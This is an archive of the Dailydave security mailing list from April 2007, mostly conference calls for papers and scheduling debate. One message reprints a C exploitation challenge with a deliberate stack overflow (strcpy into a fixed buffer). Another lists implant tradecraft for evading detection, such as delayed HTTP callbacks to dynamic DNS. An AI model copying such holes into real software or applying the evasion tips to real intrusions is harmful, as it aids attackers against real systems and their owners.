DEFCON.

CFP forms and questions should get mailed to: talks/at/defcon.org

Thanks!

The Dark Tangent

From dan at geer.org Mon Apr 9 22:40:52 2007
From: dan at geer.org (dan at geer.org)
Date: Mon, 09 Apr 2007 22:40:52 -0400
Subject: [Dailydave] DEF CON One Five CfP in effect!
In-Reply-To: Your message of "Mon, 09 Apr 2007 18:43:03 PDT." <200704100143.l3A1hoOB008165@colossus.datamerica.com>
Message-ID: <20070410024052.0D1D01BF905@absinthe.tinho.net>

A curiosity question that I've been meaning to ask... This is the Nth time
that DefCon has scheduled directly over USENIX Security. The latter, which
honestly commands my first loyalty, publicly sets its meeting dates
literally years in advance -- I know as I was on the Board for a decade.
DefCon, to this casual observer, seems to prefer an element of surprise.
Of course, one can argue that the attendees and thus the meetings don't
overlap, but that is to split the hair between choosing overlap in time
(which precludes overlapping in attendees) and choosing to overlap in
attendees (which precludes overlapping in time). And it is not just USENIX
Security; this overlap also encompasses the Electronic Voting Technology
Workshop, the HotSec Workshop, and the Metricon 2.0 Workshop as well.

Of course, one can argue that with DefCon running August 4-6 and USENIX
running August 6-10 that the meetings don't strictly overlap, but for anyone
with a travel budget (or a life) this sounds like overlap to me.

Besides, if you wanna claim that your attendees are different than someone
else's, why not overlap with SANS instead? Paller is not paying you to do
this, is he?

--dan

From shrdlu at deaddrop.org Mon Apr 9 23:21:31 2007
From: shrdlu at deaddrop.org (Etaoin Shrdlu)
Date: Mon, 09 Apr 2007 20:21:31 -0700
Subject: [Dailydave] DEF CON One Five CfP in effect!
In-Reply-To: <20070410024052.0D1D01BF905@absinthe.tinho.net>
References: <20070410024052.0D1D01BF905@absinthe.tinho.net>
Message-ID: <461B02BB.8080006@deaddrop.org>

dan at geer.org wrote:

> A curiosity question that I've been meaning to
> ask... This is the Nth time that DefCon has
> scheduled directly over USENIX Security.

Interesting that you'd say Defcon was scheduled over USENIX Security. I
always thought of it as the other way around. Having attended for lo these
many years, I can assure you that the choice of dates is not cavalier, and
because of its success it appears to conflict. For several years now, the
sister conference, Blackhat, has taken place during the week, and the
scheduling of it certainly also overlaps something or other. Defcon has
always been last few days of July, first few days of August. Always.

You just have to choose. I choose Defcon; you will probably continue to
choose Usenix Security. There you have it.

--
It is by caffeine alone I set my mind in motion.
It is by the beans of Java that thoughts acquire speed,
the hands acquire shaking, the shaking becomes a warning.
It is by caffeine only I set my mind in motion.

From rthieme at thiemeworks.com Tue Apr 10 12:30:14 2007
From: rthieme at thiemeworks.com (Richard Thieme)
Date: Tue, 10 Apr 2007 11:30:14 -0500
Subject: [Dailydave] DEF CON One Five CfP in effect!
In-Reply-To: <461B02BB.8080006@deaddrop.org>
References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org>
Message-ID: <461BBB96.6050607@thiemeworks.com>

I've been to eleven Def Cons now and this is correct - it has always been
scheduled last week of July first week of August and since Def Con 5, which
was the first Black Hat, has had to mind the tail that now is a full grown
dog ...

If someone put all the infosec, infowar, physical security, and homeland
defense cons on the calendar - would there be ANY open days in the year
besides a few holidays?

RT

Etaoin Shrdlu wrote:
> dan at geer.org wrote:
>
>> A curiosity question that I've been meaning to
>> ask... This is the Nth time that DefCon has
>> scheduled directly over USENIX Security.
>
> Interesting that you'd say Defcon was scheduled over USENIX Security. I
> always thought of it as the other way around. Having attended for lo
> these many years, I can assure you that the choice of dates is not
> cavalier, and because of its success it appears to conflict. For several
> years now, the sister conference, Blackhat, has taken place during the
> week, and the scheduling of it certainly also overlaps something or
> other. Defcon has always been last few days of July, first few days of
> August. Always.
>
> You just have to choose. I choose Defcon; you will probably continue to
> choose Usenix Security. There you have it.
From dave at immunityinc.com Tue Apr 10 13:04:45 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Tue, 10 Apr 2007 13:04:45 -0400
Subject: [Dailydave] Larger scale papers
Message-ID: <461BC3AD.7040007@immunityinc.com>

Exploiting truly large numbers of machines well requires careful
engineering. Recently we've put a couple papers on the Immunity Resources
section ( http://www.immunityinc.com/resources-papers.shtml ) to detail a
lot of the work we've done on the issue. Obviously there's a lot of things
you can do in this area, ever since ADMScan and the other mass-owners. But
some of these things you can do better. In particular, attacking non-English
Windows, and attacking Web Applications. And those two items are discussed
in the papers released today, although certainly more work remains to be
done.

Thanks,
Dave Aitel
Immunity, Inc.

From dave at immunityinc.com Tue Apr 10 15:15:53 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Tue, 10 Apr 2007 15:15:53 -0400
Subject: [Dailydave] Remotes and "remotes"
Message-ID: <461BE269.6060501@immunityinc.com>

Some notes on MS07-019 - we threw a quick and dirty PoC into Partners and
Kostya and I have looked at it to see what's up. Three things combine to
make it "unexploitable"[1]: DEP, SafeSEH, and character filtering.

DEP by default is on, since this is svchost.exe. According to Immunity
Debugger, SafeSEH protects MOST dll's in the process, so although you can
find a few to jump to...DEP protects the stack/heap so jumping directly to
shellcode is unadvised, and those DLL's are rarely in the process. Office11,
for example, throws an unprotected DLL into the process, but the filtering
prevents you from reaching it, let alone using it for anything useful.
Filling up the heap MIGHT work, but then DEP screws you again, and the
filter makes your life rather hard even without it.

SANS Diary has it split out into "Servers and Clients", but I notice that
since they have no exploit information at all, they've listed the UPNP bug
as Critical on both clients and servers. Of course, it only affects XP SP2.
This isn't a server OS, so that doesn't make sense even if it was correct.
We can't expect Swa ("the handler on duty" - a somewhat dirty title, no?) to
do vulnerability research on each patch before posting the criticality of
bugs, can we?

My point is this: Not all critical bugs are "Critical". You can save a lot
of money for a big organization by knowing which bugs are exploitable, and
which ones are not.

And kudos to eEye for the wacky bugs of the month. Those are neat.

-dave

[1]. Nothing is truly unexploitable, but let's say that any single exploit
costing 150K and 4 months or more to develop into a 30% or less reliable
exploit is "unexploitable". And that's where this one is, IMHO. Then again,
I'm happy to be proved wrong.

From adam at homeport.org Tue Apr 10 16:57:14 2007
From: adam at homeport.org (Adam Shostack)
Date: Tue, 10 Apr 2007 16:57:14 -0400
Subject: [Dailydave] DEF CON One Five CfP in effect!
In-Reply-To: <461BBB96.6050607@thiemeworks.com>
References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org> <461BBB96.6050607@thiemeworks.com>
Message-ID: <20070410205714.GA17979@homeport.org>

In 1999 or 2000, the International Financial Crypto Association looked, and
discovered that the calendar was full with events that we thought our target
market would care about, and that avoiding overlap was impossible. That was
years ago, I assume it's gotten worse as the field has grown.

At the same time, I think it would be helpful for the largest events to not
overlap. Both Blackhat and Usenix have longstanding hotel commitments which
would be challenging to rearrange at short notice, but since neither is
going away, when is the first year that one could move?

Adam

On Tue, Apr 10, 2007 at 11:30:14AM -0500, Richard Thieme wrote:
| I've been to eleven Def Cons now and this is correct - it has always
| been scheduled last week of July first week of August and since Def Con
| 5, which was the first Black Hat, has had to mind the tail that now is a
| full grown dog ...
|
| if someone put all the infosec, infowar, physical security, and homeland
| defense cons on the calendar - would there be ANY open days in the year
| besides a few holidays?
|
| RT
|
| Etaoin Shrdlu wrote:
| > dan at geer.org wrote:
| >
| >> A curiosity question that I've been meaning to
| >> ask... This is the Nth time that DefCon has
| >> scheduled directly over USENIX Security.
| >
| > Interesting that you'd say Defcon was scheduled over USENIX Security. I
| > always thought of it as the other way around. Having attended for lo
| > these many years, I can assure you that the choice of dates is not
| > cavalier, and because of its success it appears to conflict. For several
| > years now, the sister conference, Blackhat, has taken place during the
| > week, and the scheduling of it certainly also overlaps something or
| > other. Defcon has always been last few days of July, first few days of
| > August. Always.
| >
| > You just have to choose. I choose Defcon; you will probably continue to
| > choose Usenix Security. There you have it.

From dtrammell at tippingpoint.com Tue Apr 10 16:31:00 2007
From: dtrammell at tippingpoint.com (Dustin D. Trammell)
Date: Tue, 10 Apr 2007 15:31:00 -0500
Subject: [Dailydave] Security Conferences Calendar (was Re: DEF CON One Five CfP in effect!)
In-Reply-To: <461BBB96.6050607@thiemeworks.com>
References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org> <461BBB96.6050607@thiemeworks.com>
Message-ID: <1176237061.6370.255.camel@localhost>

On Tue, 2007-04-10 at 11:30 -0500, Richard Thieme wrote:
> if someone put all the infosec, infowar, physical security, and homeland
> defense cons on the calendar - would there be ANY open days in the year
> besides a few holidays?

Funny you should ask... I happen to maintain one:

http://www.google.com/calendar/embed?src=pe2ikdbe6b841od6e26ato0asc%40group.calendar.google.com

As many security related conferences and CFP deadlines as I can get my hands
on. And to answer your question, no, there aren't many open days left...
And I'm sure I'm missing some. If you happen to notice any I'm missing, feel
free to fill me in at this address or at druid at caughq.org.

--
Dustin D. Trammell
VoIP Security Research
TippingPoint, a division of 3Com
From dtangent at defcon.org Tue Apr 10 19:17:06 2007
From: dtangent at defcon.org (The Dark Tangent)
Date: Tue, 10 Apr 2007 16:17:06 -0700
Subject: [Dailydave] DEF CON One Five CfP in effect!
In-Reply-To: <461BBB96.6050607@thiemeworks.com>
References: <20070410024052.0D1D01BF905@absinthe.tinho.net> <461B02BB.8080006@deaddrop.org> <461BBB96.6050607@thiemeworks.com>
Message-ID: <200704102317.l3ANHtjx024087@colossus.datamerica.com>

It's definitely not intentional. I was contacted by Usenix last year about coordinating dates, and I let them know our contracted dates for 2007 and 2008. I bet they were already committed, though.

Jeff

At 09:30 AM 4/10/2007, you wrote:
>I've been to eleven Def Cons now and this is correct - it has always
>been scheduled last week of July first week of August and since Def Con
>5, which was the first Black Hat, has had to mind the tail that now is a
>full grown dog ...
>
>if someone put all the infosec, infowar, physical security, and homeland
>defense cons on the calendar - would there be ANY open days in the year
>besides a few holidays?
>
>RT

From dave.aitel at gmail.com Thu Apr 12 13:02:13 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Thu, 12 Apr 2007 13:02:13 -0400
Subject: [Dailydave] This ain't a scene, it's a gd arms race.
Message-ID:

http://beagle.kbs.uni-hannover.de/~beagle/Beagle++%20Demo%20-%20Xvid.avi

How cool are the new desktop search tools in Linux? Answer: Gelato in Miami Summer Cool.

Imagine if you could hook this up to your hacking tools and browse other people's information streams the way you can browse your own? Seems like it would be pretty easy to do. I should make CANVAS output its knowledge tree to Beagle++ and see what it looks like.
-dave

From dave.aitel at gmail.com Thu Apr 12 15:41:52 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Thu, 12 Apr 2007 15:41:52 -0400
Subject: [Dailydave] This ain't a scene, it's a gd arms race.
In-Reply-To:
References:
Message-ID:

The base page for Beagle++ is: http://beagle.kbs.uni-hannover.de/ . They claim you need the Xvid codec to view the video properly. It was a bit iffy on my OS X box until I refreshed it and mussed with it a bit. But it played fine after a few knocks.

Essentially the idea is that I download a lot of mailspools, and I want to search them in a "*semantic*" way ("weather" should return emails on "Snow" and "Cold"). Likewise I want the tool to automatically determine the references between people. All the people looking up yellowcake recipes and centrifuges should belong to a group, for example, that gets returned when I search on "Nukes".

Nobody's even released a tool that allows you to report on all the normal things you do during a pen test, so I doubt anyone is going to release a specialized data mining tool for hackers anytime soon. But maybe APIs like Beagle++ make the development of a special purpose tool unnecessary.

-dave

On 4/12/07, Dave Aitel wrote:
>
> http://beagle.kbs.uni-hannover.de/~beagle/Beagle++%20Demo%20-%20Xvid.avi
>
> How cool are the new desktop search tools in Linux? Answer: Gelato in
> Miami Summer Cool.
>
> Imagine if you could hook this up to your hacking tools and browse other
> people's information streams the way you can browse your own? Seems like it
> would be pretty easy to do. I should make CANVAS output its knowledge tree
> to Beagle++ and see what it looks like.
>
> -dave
>
From dave at immunityinc.com Sat Apr 14 19:07:06 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Sat, 14 Apr 2007 19:07:06 -0400
Subject: [Dailydave] Great Black Walruses of the Deep
Message-ID: <46215E9A.1080204@immunityinc.com>

Some bugs are born and die in a flash, and some bugs last forever and then disappear into the deep like a great walrus. Either way, why are people owning universities with really good 0day from IP addresses in Taiwan? I guess we'll never know.

This MSDNS bug is one of the few MSRPC bugs that can be found with a MSRPC fuzzer of the sort I demoed in Beijing at XCon. It's a rare animal though. Fuzzing is not a good way to find MSRPC bugs these days.

Along with SPIKE 3.0, we released our MSDNS MSRPC exploit today into Partners - exploits Windows 2003 and 2000 reliably, and for bonus points, defeats Wehnus's DLL randomization.

Anyways, it's Saturday, I'm in Newark International (motto: "This is not the gate you're looking for") on my way to the great white north to find another walrus or two.

-dave

From dave at immunityinc.com Tue Apr 17 02:06:23 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Tue, 17 Apr 2007 02:06:23 -0400
Subject: [Dailydave] Hmph
Message-ID: <462463DF.3090605@immunityinc.com>

I'm off to class - today is niprint day! But I did have a comment on Ryan Naraine's latest article[1], which is this: Hackers don't need hints from Microsoft's advisories.

Anyways, all those people with spare time need to step up with their third party patches! Time is of the essence people!
Eventually these patches will be put out by the hacker groups themselves, to keep the milw0rm crowd from re-owning their boxes.

-dave
[1] http://blogs.zdnet.com/security/?p=167

From krahmer at suse.de Tue Apr 17 09:02:32 2007
From: krahmer at suse.de (Sebastian Krahmer)
Date: Tue, 17 Apr 2007 15:02:32 +0200 (CEST)
Subject: [Dailydave] relro, aslr & stuff
Message-ID:

Yo,

For those who are in Linux exploitation:

http://c-skills.blogspot.com/2007/04/relro.html

This thing was to be expected I think, but it had to be done :)

l8er,
Sebastian

-- 
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)

From dummychuck at gmail.com Wed Apr 18 01:21:33 2007
From: dummychuck at gmail.com (Tucker Dummychuck)
Date: Tue, 17 Apr 2007 22:21:33 -0700
Subject: [Dailydave] Hmph
In-Reply-To: <462463DF.3090605@immunityinc.com>
References: <462463DF.3090605@immunityinc.com>
Message-ID: <94cf67610704172221q1ab680e7p9f88d1c03ab9817a@mail.gmail.com>

I'm not sure I see why we need a 3rd-party patch so urgently. The mitigation described by MS works and is fairly painless, so presumably you'd start with that if you are running DNS, and then wait for the patch from MS?

I agree that it was only a matter of time before hackers identified the flaw - either using the info on the ISC diary page or from MS's advisory. Perhaps saying that it was a stack BO made it a *little* easier to find, but that would be the obvious thing to start looking for in the first place.

Tucker.

On 4/16/07, Dave Aitel wrote:
>
> I'm off to class - today is niprint day!
> But I did have a comment on
> Ryan Naraine's latest article[1], which is this: Hackers don't need
> hints from Microsoft's advisories.
>
> Anyways, all those people with spare time need to step up with their
> third party patches! Time is of the essence people! Eventually these
> patches will be put out by the hacker groups themselves, to keep the
> milw0rm crowd from re-owning their boxes.
>
> -dave
> [1] http://blogs.zdnet.com/security/?p=167
>

From je at bitnux.com Wed Apr 18 03:41:07 2007
From: je at bitnux.com (Joel Eriksson)
Date: Wed, 18 Apr 2007 09:41:07 +0200
Subject: [Dailydave] relro, aslr & stuff
In-Reply-To:
References:
Message-ID: <20070418074107.GA105@eip.bitnux.com>

On Tue, Apr 17, 2007 at 03:02:32PM +0200, Sebastian Krahmer wrote:
>
> Yo,
>
> For those who are in Linux exploitation:
>
> http://c-skills.blogspot.com/2007/04/relro.html

On a related note:

---
/*
 * 0xbadc0ded.org Challenge #02 (2003-07-08)
 *
 * Joel Eriksson
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Two writable globals in .data: a value, and a pointer to it. */
unsigned long val = 31337;
unsigned long *lp = &val;

int main(int argc, char **argv)
{
    unsigned long **lpp = &lp, *tmp;
    char buf[128];

    if (argc != 2)
        exit(1);

    /* Unbounded copy into a 128-byte stack buffer: the challenge's bug. */
    strcpy(buf, argv[1]);

    /* Only continue if lpp still points into the 0x0804xxxx range
     * (the binary's data segment on 32-bit Linux of the time). */
    if (((unsigned long) lpp & 0xffff0000) != 0x08040000)
        exit(2);

    /* Write the address of buf through the pointer, then restore it. */
    tmp = *lpp;
    **lpp = (unsigned long) &buf;
    *lpp = tmp;

    exit(0);
}
---

I knew the technique would turn out to be useful someday.
;)

> l8er,
> Sebastian

-- 
Best Regards,
Joel Eriksson
CTO Bitsec AB

From prabu at hackinthebox.org Wed Apr 18 08:40:28 2007
From: prabu at hackinthebox.org (Praburaajan)
Date: Wed, 18 Apr 2007 20:40:28 +0800
Subject: [Dailydave] Reminder: HITBSecConf2007 - Malaysia: Call for Papers closing in 2 weeks
Message-ID: <462611BC.1050501@hackinthebox.org>

Greetings from sunny Malaysia!

This is a reminder that the Call for Papers for the upcoming HITBSecConf2007 - Malaysia is closing on the 1st of May. HITBSecConf2007 - Malaysia is set to take place from the 3rd till the 6th of September in Kuala Lumpur. Our event last year attracted over 600 attendees from all corners of the globe and this year we are expecting this number to grow to well over 800. In addition, the event will feature 4 keynote speakers, 40 researchers, 7 tracks of hands-on technical trainings, a dual-track security conference, capture the flag competition, a lock picking village, zone-h/hitb hacking challenge, bzflag competition and one MASSIVE post conference party!!!

If you only attend ONE event this year; make sure it's HITBSecConf2007 - Malaysia; Asia's largest network security conference!

From info.hacklu at gmail.com Wed Apr 18 10:11:17 2007
From: info.hacklu at gmail.com (Hack Lu)
Date: Wed, 18 Apr 2007 16:11:17 +0200
Subject: [Dailydave] CfP: Hack.lu 2007
Message-ID: <1b8ceb1b0704180711l48200644ka03d55223ab44a3b@mail.gmail.com>

========================================
Call for Papers Hack.lu 2007
========================================

The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each other and share freely all kind of information.

The convention will be held in the Grand-Duchy of Luxembourg in October 2007 (18-20.10.2007).
Scope
======

Topics of interest include, but are not limited to :

* Software Engineering and Security
* Honeypots/Honeynets
* Spyware, Phishing and Botnets (Distributed attacks)
* Newly discovered vulnerabilities in software and hardware
* Electronic/Digital Privacy
* Wireless Network and Security
* Attacks on Information Systems and/or Digital Information Storage
* Electronic Voting
* Free Software and Security
* Assessment of Computer, Electronic Devices and Information Systems
* Standards for Information Security
* Legal and Social Aspect of Information Security
* Security in Information Retrieval
* Network security

Deadlines
=========

The following dates are important if you want to participate in the CfP

Abstract submission : no later than 1 June 2007
Full paper submission : no later than 15 July 2007
Notification date : around end of July beginning of August

Submission guideline
====================

Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words.

Submissions must be sent to : hack2007-paper(AT)hack.lu

Submissions should also include the following:

1. Presenter, and geographical location (country of origin/passport) and contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important tutorial.
6. Optionally, any samples of prepared material or outlines ready.

The information will be used only for the sole purpose of the hack.lu convention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname.
Speakers' Privileges
====================

* Accommodation will be provided (max 3 nights)
* Travel expenses will be covered
* Conference speakers night
* speakers goodies...

Program Committee
=================

http://www.hack.lu/index.php/ProgramCommittee

Publication and rights
======================

Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication.

Sponsoring
==========

If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu

Web site and wiki
=================

http://www.hack.lu/

From dave at immunityinc.com Thu Apr 19 01:38:02 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 19 Apr 2007 01:38:02 -0400
Subject: [Dailydave] Hacker opsec case study
Message-ID: <4627003A.6080503@immunityinc.com>

http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department

This is a great article from the perspective of "How long in the State dept. does one Word 0day buy you."

It's like a hacker opsec case study.

-dave

From lists at isecom.org Thu Apr 19 04:22:38 2007
From: lists at isecom.org (Pete Herzog)
Date: Thu, 19 Apr 2007 10:22:38 +0200
Subject: [Dailydave] Hacker opsec case study
In-Reply-To: <4627003A.6080503@immunityinc.com>
References: <4627003A.6080503@immunityinc.com>
Message-ID: <462726CE.40009@isecom.org>

I think this says more about the poor defensive technique of "patching" and reliance upon it than about the 0day itself.

-pete.
Dave Aitel wrote:
>
> http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department
>
> This is a great article from the perspective of "How long in the State
> dept. does one Word 0day buy you."
>
> It's like a hacker opsec case study.
>
> -dave
>

From mwollenweber at gmail.com Thu Apr 19 11:10:10 2007
From: mwollenweber at gmail.com (matthew wollenweber)
Date: Thu, 19 Apr 2007 11:10:10 -0400
Subject: [Dailydave] Hacker opsec case study
In-Reply-To: <4627003A.6080503@immunityinc.com>
References: <4627003A.6080503@immunityinc.com>
Message-ID: <42210a440704190810s3d9d5913u17409798b0ea3b49@mail.gmail.com>

As an infosec contractor "working for the government in the Baltimore/Washington Metro" I often see a lot of crazy things. Often intrusion sets are defined and detected like they are in the corporate world: by a signature rule-set and IP location (address range). Usually the rule-set is created after the attacker does something obvious like pulling down gigs of data in one night to an unfriendly state. To me this implies that they expect to get noticed.

I have seldom (almost never) seen an attack discovered where the technology was something I'd consider doing such as:

1. Non-public implant with http call backs to a dynamic dns server
2. Call backs are slow and initially occur a while after exploitation
3. You don't use encryption (it's generally easy to detect)
4.
Traffic is to/from "safe" IPs -- let's say if you were a local power company well then traffic to Russia is unexpected but traffic to a local small business is generally "safe".
5. You don't do something stupid (your version of windows is non-US, you scan from your IP, etc).

To me those are basic steps when performing a covert pen-test (modified to be legal and compliant with the rules of engagement). I can't imagine that a nation state would do any less. There's at least the first clear mistake of calling back to Asia and Congressmen are quoted as "These are experienced, sophisticated people who are trying to exploit our vulnerabilities and gain access to our information," Thompson said. And a second is implied by "tripwires severed Internet connections in the region after a limited amount of data was detected being stolen" (I've seldom seen a "tripwire" that wasn't tuned to sever connections until something blatantly bad was occurring).

So things are bad when one Word 0-day gives you prolonged access to US govt assets, but it's even worse when the attacker was doing some dumb things and the people in charge think the attack was extremely sophisticated and beyond the skill and resource level of a 20-something computer science student.

On 4/19/07, Dave Aitel wrote:
>
> http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department
>
> This is a great article from the perspective of "How long in the State
> dept. does one Word 0day buy you."
>
> It's like a hacker opsec case study.
>
> -dave
>

-- 
Matthew Wollenweber
mwollenweber at gmail.com
skytel: 800-206-3041 | 2063041 at skytel.com

From dave at immunityinc.com Thu Apr 19 12:57:19 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 19 Apr 2007 12:57:19 -0400
Subject: [Dailydave] Revision control is great.
Message-ID: <46279F6F.2000102@immunityinc.com>

Today in the great white north, the train was late by ten minutes. At first I thought there was going to be a riot, but then everyone just huddled into the stairwell for warmth like a group of emperor penguins.

Anyways, since I'm teaching, I mostly fix CANVAS bugs and prepare for class all night, but I've been slowly working on a new thing, which I hope will be done soon. Essentially the problem is that I want a bunch of people to be able to comment up a disassembly all at the same time, much like we all code on one exploit at the same time. I also am tired of commenting the same parts of dll's on various VM's just in different language packs. Bindiff solves the second problem, but there's a small part of this problem that I don't need a Bindiff to solve, and I still want to solve it. Likewise there are other issues I'd like to solve peripherally, and they're all built using different tools that don't work together. So I want to expose all those tools to each other and to my disassembler.
Anyways, my attempted solution is this:

When you click "export" in ImmDBG, I want it to export a semi-portable mapping file with all your names and comments and other data (analysis data or type data from unmidl, for example) to an XML file. If you want to include arbitrary Python objects in there as marshalled strings, that's cool too. Whatever you want goes into this structured XML file, which is then automatically synced to the main server with CVS/SVN. This buys us revision control for free. So when I install ImmDBG on some random VM, I point it at the company SVN server, and every time I attach to something any comments I'd done on those DLL's before get automatically imported, updated, changed, and committed. Likewise if I want to work on the XML file with PaiMei or Bindiff or whatever else, I can do that quite quickly and easily. And the whole team can work together the exact same way they work together on source code, using the exact same toolset they're used to.

Just an idea.

-dave

From dominique.brezinski at gmail.com Thu Apr 19 12:59:27 2007
From: dominique.brezinski at gmail.com (Dominique Brezinski)
Date: Thu, 19 Apr 2007 09:59:27 -0700
Subject: [Dailydave] Hacker opsec case study
In-Reply-To: <462726CE.40009@isecom.org>
References: <4627003A.6080503@immunityinc.com> <462726CE.40009@isecom.org>
Message-ID: <597760c90704190959k405fb1e1x1e7a3b55460bb1ef@mail.gmail.com>

I think Dave's point was related to how far they got once they had their foot in the door on one workstation. I have a lot of experience related to assessing the risks associated with workstation compromise through client-side/data-driven exploits and first-hand experience seeing how far a skilled adversary can get.
Dave seems to be saying this serves as a good case study to that effect, which I would agree with.

Dom

On 4/19/07, Pete Herzog wrote:
> I think this says more about the poor defensive technique of "patching" and
> reliance upon it than about the 0day itself.
>
> -pete.
>
>
> Dave Aitel wrote:
> >
> > http://news.yahoo.com/s/ap/20070419/ap_on_hi_te/hackers_state_department
> >
> > This is a great article from the perspective of "How long in the State
> > dept. does one Word 0day buy you."
> >
> > It's like a hacker opsec case study.
> >
> > -dave
> >
>

From dave at immunityinc.com Thu Apr 19 18:19:40 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 19 Apr 2007 18:19:40 -0400
Subject: [Dailydave] .sg has cold beer!
Message-ID: <4627EAFC.4090803@immunityinc.com>

http://www.syscan.org/ call for papers expires April 30th!

Recommend talk title: "One hour of Microsoft Word 0days: We release one 0day a minute for one hour. Then we eat stingray and drink beer."

Remember, 9 out of 10 hackers prefer to drink with Thomas Lim!
-dave

From gobbles at hushmail.com Sat Apr 21 14:54:07 2007
From: gobbles at hushmail.com (gobbles at hushmail.com)
Date: Sat, 21 Apr 2007 14:54:07 -0400
Subject: [Dailydave] GOBBLES is calling out Dr. Neal Krawetz.
Message-ID: <20070421185415.D7430C383D@mailserver10.hushmail.com>

Dear fans,

Below is an email we sent to Dr. Neal Krawetz, author of "who_is_n3td3v.pdf", a document that uses flawed logic to "prove" that GOBBLES Security members are behind the alias n3td3v, which obviously is not true. We have tried numerous times to establish contact with the good doctor, and to have him publish an apology and retract his libelous allegations. He is however adamant in his position that he is correct, and refuses to entertain any evidence presented that proves his conclusions contrary. Since he is no longer answering our emails, and authoring articles on the subject of internet character defamation for securityfocus, we have no choice but to call him on his bullshit publicly. If you run a security conference and would like to provide the venue for the challenge described below, please contact us immediately.

For the record, we have never had anything to do with the online identity n3td3v, and to our collective knowledge have had no contact in any way with the individual(s) behind the alias. Also for the record, Neal Krawetz is an academic fraud who cannot cite the source of the axioms he constantly refers to, since the basis of all his research is clearly horseshit.

In God We Trust,
GOBBLES Security

Neal,

Since you have forced us out of retirement, perhaps you would be interested in helping us back into retirement?
A proposal is in the works for an upcoming security conference (no, we haven't decided which yet - perhaps we can publish the proposal then see which organizers make the best offer to us?) where we send a representative (from our defunct, dissolved, and otherwise nonexistent organization) to the conference to meet with you, in person. The conference organizer will be responsible for providing an unbiased polygraph and polygraph technician.

There should be two rounds to the presentation. Round one is with our representative taking the polygraph, with you administering the questions. The realm of questioning shall be strictly limited to your observations and conclusions from your paper. This seems like the best way to put your methodology to the test, because otherwise it's simply a game of hearsay and you'll continue to take the upper ground because there simply is no way to prove or disprove your claims.

The second round will be with you taking the polygraph, and our representative administering the questions. Again, the scope of the questioning will be strictly limited to your work, your confidence in your observations, and those sorts of things. We will not make this a personal attack of any sort, and expect the same level of professionalism from you. Perhaps we should send lists of questions directly to the conference organizer, who can review and censor the questions as deemed appropriate, that way neither you nor our representative can blindside with unfair questions that are not a part of the presentation.

After both rounds of questioning, the polygraph technician can then draw conclusions from their tests, and declare Gobbles Security or Neal Krawetz as the winner of the scientific challenge. To the victor goes the spoils, and if our representative indeed wins this contest, and proves by scientific measure your research and conclusions are absolutely wrong, we want you to surrender your Texas A&M supplied PhD.
If you win, we are not sure what you would want as a prize from us, so we will leave that up to you. Along with your demands, we will also resign and dissolve once again, and promise to never be heard from again. If you are the victor, you will have defeated the evil hackers and made the interweb a much safer place! You will be a hero to the masses, and have the title of "Greatest Computer Security Hero" for the rest of your life!

So, are you game? Do you have confidence in your scientific process, claims, and conclusions? Are you willing to put yourself to the test, in a public forum? Please let us know within one calendar week from today (10/4/2007) so we can progress! There will be a lot of planning that both parties will need to do, so let's get moving on this ASAP!

Thank you for your time,
Gobbles Security :)

From nahual at 0hday.org Tue Apr 24 16:09:45 2007
From: nahual at 0hday.org (El Nahual)
Date: Tue, 24 Apr 2007 15:09:45 -0500
Subject: [Dailydave] CFP it1tk1 '07
In-Reply-To: <462726CE.40009@isecom.org>
References: <4627003A.6080503@immunityinc.com> <462726CE.40009@isecom.org>
Message-ID: <462E6409.6030903@0hday.org>

======================
Call for Papers it1tk1 '07
======================

The purpose of it1tk1 is to have an open environment where people can discuss new technologies both in attack and defense strategies and new trends and research. it1tk1 '07 is a highly technical convention in which technical and non-technical people can meet each other and have a great time talking, sharing information and more.
The convention will be held in Mexico City from the 23rd to the 28th of October (we know it looks long but it has 2 stages)

Stage 1: Corporative Track (23rd, 24th)

This track will have technical and not so technical talks, based mostly in defensive and some offensive oriented techniques and trends, mostly for technical and non-technical people.

Stage 2: Technical/Hacker Track (26th, 28th)

This track is no-holds-barred technical talks, in our true sense, we shall Capture The Flag (CTF), Throw the CellPhone (TTCP), Wall Of Shame, 1 Hour for improvised talks and much more...

We hope you enjoy it!

Scope
======

Topics of interest include, but are not limited to :

* Software Engineering and Security
* Spyware, Phishing and Botnets (Distributed attacks)
* Newly discovered vulnerabilities in software and hardware
* Wireless Network and Security
* Attacks on Information Systems and/or Digital Information Storage
* Electronic Voting
* Electronic Money
* Free Software and Security
* Assessment of Computer, Electronic Devices and Information Systems
* Standards for Information Security
* Forensics
* Network security
* GSM Security

Deadlines
=========

The following dates are important if you want to send us your talks:

* Abstract submission : no later than 15 June 2007
* Full paper submission : no later than 25 July 2007
* Notification date : Second week of August 2007

Submission guideline
====================

